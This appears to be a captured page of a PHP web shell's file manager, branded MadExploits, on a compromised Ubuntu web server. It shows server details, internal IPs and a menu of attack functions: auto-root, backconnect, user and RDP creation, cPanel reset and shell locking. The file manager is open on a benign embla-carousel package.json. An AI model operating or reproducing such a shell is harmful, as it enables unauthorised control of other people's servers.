Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cqt /
node_modules /
embla-carousel /
[ HOME SHELL ]
Name
Size
Permission
Action
cjs
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
esm
[ DIR ]
drwxr-xr-x
README.md
13.52
KB
-rw-r--r--
embla-carousel.umd.js
17.53
KB
-rw-r--r--
index.d.ts
662
B
-rw-r--r--
package.json
1.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "embla-carousel", "version": "8.6.0", "author": "David Jerleke", "description": "A lightweight carousel library with fluid motion and great swipe precision", "repository": { "type": "git", "url": "git+https://github.com/davidjerleke/embla-carousel" }, "bugs": { "url": "https://github.com/davidjerleke/embla-carousel/issues" }, "homepage": "https://www.embla-carousel.com", "license": "MIT", "keywords": [ "slider", "carousel", "slideshow", "gallery", "lightweight", "touch", "javascript", "typescript", "react", "vue", "svelte", "solid" ], "main": "embla-carousel.umd.js", "unpkg": "embla-carousel.umd.js", "module": "./esm/embla-carousel.esm.js", "types": "index.d.ts", "sideEffects": false, "files": [ "embla-carousel*", "components/**/*", "index.d.ts", "esm/**/*", "cjs/**/*" ], "scripts": { "test": "jest --config jest.config.js", "build": "rollup --bundleConfigAsCjs -c", "start": "rollup --bundleConfigAsCjs -c --watch --environment BUILD:development", "eslint:report": "eslint \"src/**/*.{js,tsx,ts}\"" }, "devDependencies": { "@types/jest": "^29.5.6", "@typescript-eslint/eslint-plugin": "^6.9.0", "@typescript-eslint/parser": "^6.9.0", "eslint": "^8.52.0", "eslint-config-prettier": "^9.0.0", "eslint-plugin-prettier": "^4.0.0", "jest": "^29.5.0", "jest-environment-jsdom": "^29.5.0", "prettier": "2.8.8", "rollup": "^4.22.4", "ts-jest": "^29.1.1", "typescript": "^5.2.2" }, "exports": { "./package.json": "./package.json", ".": { "import": { "types": "./esm/index.d.ts", "default": "./esm/embla-carousel.esm.js" }, "require": { "types": "./cjs/index.d.ts", "default": "./cjs/embla-carousel.cjs.js" } } } }
Close